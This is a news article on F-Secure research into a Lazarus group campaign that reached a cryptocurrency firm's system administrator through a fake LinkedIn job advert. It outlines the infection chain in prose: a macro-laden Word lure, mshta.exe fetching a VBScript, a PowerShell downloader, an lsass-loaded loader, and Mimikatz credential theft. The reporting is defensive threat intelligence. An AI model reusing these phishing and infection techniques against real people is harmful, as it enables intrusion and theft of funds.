Lazarus group strikes cryptocurrency firm through LinkedIn job adverts

Updated: A system administrator proved to be the weak link, opening the door for Lazarus to attack.
Written by Charlie Osborne, Contributing Writer

The Lazarus group is on the hunt for cryptocurrency once more and has now launched a targeted attack against a crypto organization by exploiting the human element of the corporate chain.

On Tuesday, cybersecurity researchers from F-Secure said the cryptocurrency organization is one of the latest victims in a global campaign which has targeted businesses in at least 14 countries including the UK and US. 

Lazarus is an advanced persistent threat (APT) group thought to be tied to North Korea. Economic sanctions against the country imposed due to nuclear programs, human rights abuses, and more may have something to do with the group, which focuses on financially-motivated attacks that have expanded to include cryptocurrency in the past three years. 

The US government says Lazarus was formed in 2007 and since then, researchers have attributed the group as responsible for the global WannaCry attack wave, the $80 million Bangladeshi bank heist, and the 2018 HaoBao Bitcoin-stealing campaign. 

See also: US charges two Chinese nationals for laundering cryptocurrency for North Korean hackers
According to F-Secure, the latest Lazarus attack was tracked through a LinkedIn job advert. The human target, a system administrator, received a phishing document in their personal LinkedIn account that related to a blockchain technology company seeking a new sysadmin with the employee's skill set.   

The phishing email is similar to Lazarus samples already made available on VirusTotal, including the same names, authors, and word count elements. 

As is the case with many phishing documents, you need to entice a victim to enable macros that hide malicious code for them to be effective. In this case, the Microsoft Word document claimed to be protected under the EU's General Data Protection Regulation (GDPR), and so, the document's content could only be shown if macros were enabled. 

Once permission is granted, the document's macro created a .LNK file designed to execute a file called mshta.exe and call out a bit.ly link connected to a VBScript. 

This script conducts system checks and sends operational information to a command-and-control (C2) server. The C2 provides a PowerShell script able to fetch Lazarus malware payloads. 

CNET: Weather Channel's location data settlement doesn't mean much for your privacy

The infection chain changes depending on system configuration and a range of tools are used by the threat actors. These include two backdoor implants similar to those already documented by Kaspersky (.PDF) and ESET

Lazarus is also using a custom portable executable (PE) loader, loaded into the lsass.exe process as a 'security' package that modifies registry keys using the schtasks Windows utility.
Other malware variants used by Lazarus are able to execute arbitrary commands, decompress data in memory, as well as download and execute additional files. These samples, including a file called LSSVC.dll, were also used to connect backdoor implants to other target hosts. 

TechRepublic: CISOs should put ad fraud security on their radars

A tailored version of Mimikatz is used to harvest credentials from an infected machine, especially those with financial value -- such as cryptocurrency wallets or online bank accounts. 

F-Secure says that Lazarus has attempted to avoid detection by wiping evidence, including deleting security events and logs. However, it was still possible to snag a few samples of the APT's current toolkit to investigate the group's current activities. 

"It is F-Secure's assessment that the group will continue to target organizations within the cryptocurrency vertical while it remains such a profitable pursuit, but may also expand to target supply chain elements of the vertical to increase returns and longevity of the campaign," the researchers say.  

Update 19.16 pm BST: Paul Rockwell, Head of Trust and Safety at LinkedIn told ZDNet:

"We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members. We don't wait on requests, our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies. Our teams utilize a variety of automated technologies, combined with a trained team of reviewers and member reporting, to keep our members safe from all types of bad actors. We enforce our policies, which are very clear: the creation of a fake account or fraudulent activity with an intent to mislead or lie to our members is a violation of our terms of service." 

Previous and related coverage

Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

Editorial standards